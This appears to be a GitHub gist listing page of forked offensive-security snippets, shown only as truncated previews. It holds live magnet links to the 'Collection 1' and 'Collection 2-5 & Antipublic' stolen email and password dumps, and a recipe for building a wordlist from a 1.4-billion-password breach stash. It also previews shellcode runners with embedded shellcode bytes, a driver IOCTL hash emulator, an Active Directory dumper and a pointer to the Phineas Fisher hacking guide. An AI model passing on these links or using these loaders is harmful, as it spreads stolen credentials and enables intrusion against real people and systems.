gavz
/ handshake_hash.py
Created
May 5, 2026 21:28
— forked from pierrehpezier/handshake_hash.py
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| """ | |
| handshake_hash.py | |
| ================= | |
| Emulate the Htsysm49BE01 driver's RE_handshake_hash_v[0..3] in user-mode | |
| via Unicorn so a client can compute the expected verify hash for IOCTL | |
| 0xAA023828 without any kernel-mode hooks, breakpoints, or driver patching. | |
| Why this works (and why the driver author thought it wouldn't): |
gavz
/ gist:21900b7d635df0bbd03b223723830dbe
Created
February 25, 2026 01:25
— forked from jaredsburrows/gist:9e121d2e5f1147ab12a696cf548b90b0
full English translation of Phineas Fisher's account of how he took down HackingTeam - https://www.reddit.com/r/netsec/comments/4f3e6p/full_english_translation_of_phineas_fishers/
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| _ _ _ ____ _ _ | |
| | | | | __ _ ___| | __ | __ ) __ _ ___| | _| | | |
| | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / | | |
| | _ | (_| | (__| < | |_) | (_| | (__| <|_| | |
| |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_) | |
| A DIY Guide | |
gavz
/ breach.txt
Created
February 10, 2026 20:14
— forked from jimmy-ly00/breach.txt
Email and password breach collection list
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Please Note, I am sharing this, hoping this will be used for good public use, such as data analysis, penetration testing etc | |
| # These links are already available all over the internet | |
| # Also Note, Trying to login into someone else's account without their permission is unethical and illegal | |
| # Collection 1 | |
| magnet:?xt=urn:btih:B39C603C7E18DB8262067C5926E7D5EA5D20E12E&dn=Collection%201&tr=udp%3a%2f%2ftracker.coppersurfer.tk%3a6969%2fannounce&tr=udp%3a%2f%2ftracker.leechers-paradise.org%3a6969%2fannounce&tr=http%3a%2f%2ft.nyaatracker.com%3a80%2fannounce&tr=http%3a%2f%2fopentracker.xyz%3a80%2fannounce | |
| # Collection 2-5 & Antipublic | |
| magnet:?xt=urn:btih:D136B1ADDE531F38311FBF43FB96FC26DF1A34CD&dn=Collection%20%232-%235%20%26%20Antipublic&tr=udp%3a%2f%2ftracker.coppersurfer.tk%3a6969%2fannounce&tr=udp%3a%2f%2ftracker.leechers-paradise.org%3a6969%2fannounce&tr=http%3a%2f%2ft.nyaatracker.com%3a80%2fannounce&tr=http%3a%2f%2fopentracker.xyz%3a80%2fannounce |
gavz
/ breachcompilation.txt
Created
February 10, 2026 20:05
— forked from Green-m/breachcompilation.txt
1.4 billion password breach compilation wordlist
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| wordlist created from original 41G stash via: | |
| grep -rohP '(?<=:).*$' | uniq > breachcompilation.txt | |
| Then, compressed with: | |
| 7z a breachcompilation.txt.7z breachcompilation.txt | |
| Size: |
gavz
/ ldrloaddll_hook.c
Created
February 2, 2026 20:28
— forked from bats3c/ldrloaddll_hook.c
Hook LdrLoadDll to whitelist DLLs being loaded into a process
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <windows.h> | |
| #include <winternl.h> | |
| #define dwAllowDllCount 1 | |
| CHAR cAllowDlls[dwAllowDllCount][MAX_PATH] = { | |
| "W:\\allowed.dll" | |
| }; | |
| VOID HookLoadDll(LPVOID lpAddr); |
gavz
/ IDAPython_disassembly.py
Created
January 28, 2026 21:56
— forked from enkomio/IDAPython_disassembly.py
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # this IDAPython code can be used to disassembly an instruction | |
| instruction = ida_ua.insn_t() | |
| idaapi.decode_insn(instruction, address) | |
| disassembly = f"{hex(instruction.ea)} {instruction.get_canon_mnem()} " | |
| for i, op in enumerate(instruction.ops): | |
| if op.type == ida_ua.o_void: | |
| continue | |
| if i > 0: | |
| disassembly += ", " | |
| if op.type == ida_ua.o_reg: |
gavz
/ Program.cs
Created
October 31, 2025 21:06
— forked from whokilleddb/Program.cs
CLR uses an executable heap - so why shouldn't we?
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Runtime.InteropServices; | |
| namespace ExecutableHeapInfo | |
| { | |
| class Program | |
| { | |
| // Import GetProcessExecutableHeap from mscoreei.dll | |
| [DllImport("mscoreei.dll", SetLastError = true)] | |
| private static extern IntPtr GetProcessExecutableHeap(); |
gavz
/ JasonToddIsTheBestRobin.c
Created
September 25, 2025 22:41
— forked from whokilleddb/JasonToddIsTheBestRobin.c
Unnecessarily complicated way of controlling shellcode execution using InternetStatusCallback()
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <wininet.h> | |
| #include <stdio.h> | |
| #pragma comment(lib, "wininet.lib") | |
| // notepad.exe shellcode | |
| char shellcode[] = { | |
| 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, | |
| 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, |
gavz
/ badsuccessordumper_postpatch.py
Created
September 1, 2025 21:24
— forked from ThePirateWhoSmellsOfSunflowers/badsuccessordumper_postpatch.py
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import argparse | |
| import datetime | |
| import logging | |
| import os | |
| import random | |
| import struct | |
| import sys | |
| from binascii import hexlify, unhexlify | |
| from six import ensure_binary |
gavz
/ enclave.c
Created
August 4, 2025 20:21
— forked from whokilleddb/enclave.c
Run shellcode using LdrCallEnclave
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <windows.h> | |
| // Shellcode template from: https://gist.github.com/kkent030315/b508e56a5cb0e3577908484fa4978f12 | |
| // Compile using: x86_64-w64-mingw32-gcc -m64 enclave.c -o enclace.exe -lntdll | |
| EXTERN_C NTSYSAPI | |
| NTSTATUS | |
| NTAPI LdrCallEnclave( | |
| _In_ PENCLAVE_ROUTINE Routine, |
NewerOlder